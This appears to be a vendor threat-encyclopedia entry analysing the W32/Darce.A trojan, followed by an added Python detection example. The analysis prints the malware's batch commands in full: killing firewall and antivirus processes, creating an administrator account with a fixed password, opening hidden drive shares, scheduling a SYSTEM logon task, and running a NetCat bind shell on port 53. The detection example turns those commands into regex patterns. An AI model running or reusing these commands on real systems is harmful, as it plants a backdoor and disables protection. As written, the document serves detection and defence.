Lumension® Endpoint Intelligence Center


Overview

Threat Risk: LOW
Destructivity: MEDIUM
Payload:
Detection files published:
Description created: 06 Feb 2005 10:19:00
Description updated: 06 Feb 2005 10:19:00
Malware type: TROJAN
Alias:
Spreading mechanism:
Summary: None

W32/Darce.A

Spreading

When Darce.A is executed it drops several files on disk:

  readme.txt (copy of UnRAR)
  setup.exe (compiled batch file)
  unpack.rar (encrypted RAR file)

setup.exe is then run, and it decrypts a batch file to c:\a7356.bat, which is then executed. The batch file performs the following operations:

1. Renames the dropped file readme.txt to cuk.exe. It then executes cuk.exe with the following command line:

  e unpack.rar %windir% -y -pko;XqZpX!qYpYlT -inul

This extracts 4 files from unpack.rar to the %WINDIR% directory:

  schtasks.exe (Czech version of Microsoft's Schedule Tasks)
  schvost.exe (NetCat for Windows)
  taskkill.exe (Czech version of Microsoft's Task Kill)
  odbcjet.vbs (Visual Basic script used for performing tasks at logon)

2. Calls taskkill.exe with the following parameters:

  /f /im kpf4ss.exe
  /f /im ccProxy.exe

This forcefully terminates processes with the image names kpf4ss.exe (Kerio Personal Firewall 4 Service) and ccProxy.exe (Symantec AV component). The result is piped to a file named "%TEMP%\~015799.tmp".

3. Calls the following commands if the file %WINDIR%\system32\zonelabs\vsruledb.dll (ZoneAlarm firewall component) is not present on the system:

  hostname
  ipconfig /all

The results of these commands are piped to %TEMP%\~015798.tmp.

4. Calls further commands to gather information about the system:

  ver
  chdir
  set
  tasklist
  net start
  dir /a /q "%SystemDrive%\"
  dir /a /q "%ProgramFiles%\"
  dir /a "%userprofile%"\..
  dir /a d:\
  net localgroup

The results of all commands are piped to %TEMP%\~015799.tmp and %TEMP%\~0157998.tmp.

5. Uses NET USER to delete the HelpAssistant account and recreate it with the password "Cukotka5". The HelpAssistant account is then added to the Power Users group and deleted from the Users group. All results are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp.

6. Calls more commands which are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp:

  net localgroup administrators
  net localgroup "Power Users"
  net localgroup users
  cacls "%userprofile%" /e /c /p "helpassistant":f
  cacls . /e /c /p "helpassistant":f
  fsutil fsinfo drives
  net share RPC$=c: /remark:"Vyhrazeno systemu Windows"
  net share ACL$=d: /remark:"Vyhrazeno systemu Windows"
  net share USR$="%userprofile%" /remark:"Vychozi sdileni uzivatele"
  type %systemdrive%\boot.ini

7. Appends %TEMP%\~015798.tmp to %TEMP%\~015799.tmp.

8. Copies %TEMP%\~015799.tmp, which now contains a rather comprehensive overview of the system, to the following locations:

  %WINDIR%\system32\msmgmt.dll
  %HOMEDRIVE%\%HOMEPATH%\PNG00002.jpg

9. Schedules a task using schtasks.exe, which was previously dropped into the %WINDIR% folder. The parameters used are:

  /create /tn AT1 /tr %windir%\odbcjet.vbs /sc onlogon /ru system

This creates a task with the name "AT1", and specifies that odbcjet.vbs should be scheduled to run at every logon under the user context NT AUTHORITY\SYSTEM. The file odbcjet.vbs, which was also dropped into the %WINDIR% directory, is a Visual Basic script file that calls the following commands:

  net stop SharedAccess
  net stop alg.exe
  net stop sscansvc.exe
  schvost.exe -L -p 53 -e cmd.exe
  net user HelpAssistant /add
  net localgroup administrators helpassistant /add
  net share RPC$=c: /remark:Windows

The above schvost command causes schvost.exe to listen on port 53 for incoming connections. This enables an attacker to connect to an infected machine on port 53 and control a remote command prompt running with SYSTEM privileges.

10. Calls Taskkill.exe with the following parameters if %WINDIR%commandedit.com is not present on the system:

  /f /im setup.exe

This will forcefully terminate setup.exe, the program which created the batch file.

11. Renames setup.exe to sesit.xls and then deletes the file.

12. Deletes unpack.rar and cuk.exe.

Payload Details

Creates a backdoor which listens for connections on port 53 (TCP).

Prevents the following services from running:

  Application Layer Gateway Service (alg.exe)
  Windows Firewall/Internet Connection Sharing (ICS) (SharedAccess)
  GFI LANguard N.S.S. Scheduled Scans Service (sscansvc.exe)

Creates an account in the administrators group called HelpAssistant, with the password "Cukotka5".

Shares c:\ as RPC$.
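The command lines quoted in this description can be matched against process-creation logs to find affected hosts. The following is an added example, not part of the original description and not a vendor signature; the rule names, regexes, the threshold of three behaviours and the sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for command lines quoted in the description above.
# Rule names and regexes are this example's own, not vendor signatures.
RULES = {
    "kill_security_process": r"\btaskkill(\.exe)?\s.*/im\s+(kpf4ss|ccproxy)\.exe",
    "helpassistant_account": r"\bnet1?\s+user\s+helpassistant\b",
    "helpassistant_to_admins": r"\bnet1?\s+localgroup\s+administrators\s+helpassistant\s+/add",
    "hidden_drive_share": r"\bnet1?\s+share\s+(rpc|acl|usr)\$=",
    "logon_task_odbcjet": r"\bschtasks(\.exe)?\s.*/create\s.*odbcjet\.vbs.*/sc\s+onlogon",
    "stop_protection_service": r"\bnet1?\s+stop\s+(sharedaccess|alg\.exe|sscansvc\.exe)",
    "shell_listener_port_53": r"\bschvost\.exe\s.*-p\s+53\s.*-e\s+cmd\.exe",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]

def hits_by_host(events):
    """Map host -> sorted distinct rule names seen in its (host, cmdline) events."""
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host].update(match_rules(cmdline))
    return {h: sorted(r) for h, r in hits.items() if r}

def flagged_hosts(events, threshold=3):
    """Hosts with at least `threshold` distinct behaviours (threshold is an assumption)."""
    return sorted(h for h, r in hits_by_host(events).items() if len(r) >= threshold)

# Constructed sample process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"C:\WINDOWS\taskkill.exe /f /im kpf4ss.exe"),
    ("WS01", r"schtasks.exe /create /tn AT1 /tr C:\WINDOWS\odbcjet.vbs /sc onlogon /ru system"),
    ("WS01", r"net stop SharedAccess"),
    ("WS01", r"schvost.exe -L -p 53 -e cmd.exe"),
    ("WS01", r"net user HelpAssistant /add"),
    ("WS01", r"net localgroup administrators helpassistant /add"),
    ("WS01", r"net share RPC$=c: /remark:Windows"),
    ("WS02", r"taskkill /f /im notepad.exe"),   # benign admin activity
    ("WS02", r"net share"),
    ("WS02", r"schtasks /query"),
    ("WS03", r"net stop SharedAccess"),          # single weak signal, not flagged
]

if __name__ == "__main__":
    for host, rules in hits_by_host(SAMPLE_EVENTS).items():
        print(host, rules)
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

Requiring several distinct behaviours per host keeps a lone `net stop SharedAccess` from raising an alert on its own.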

Analysis

n/a

Removal

n/a


Last Updated: 12 Nov 2015 11:06:15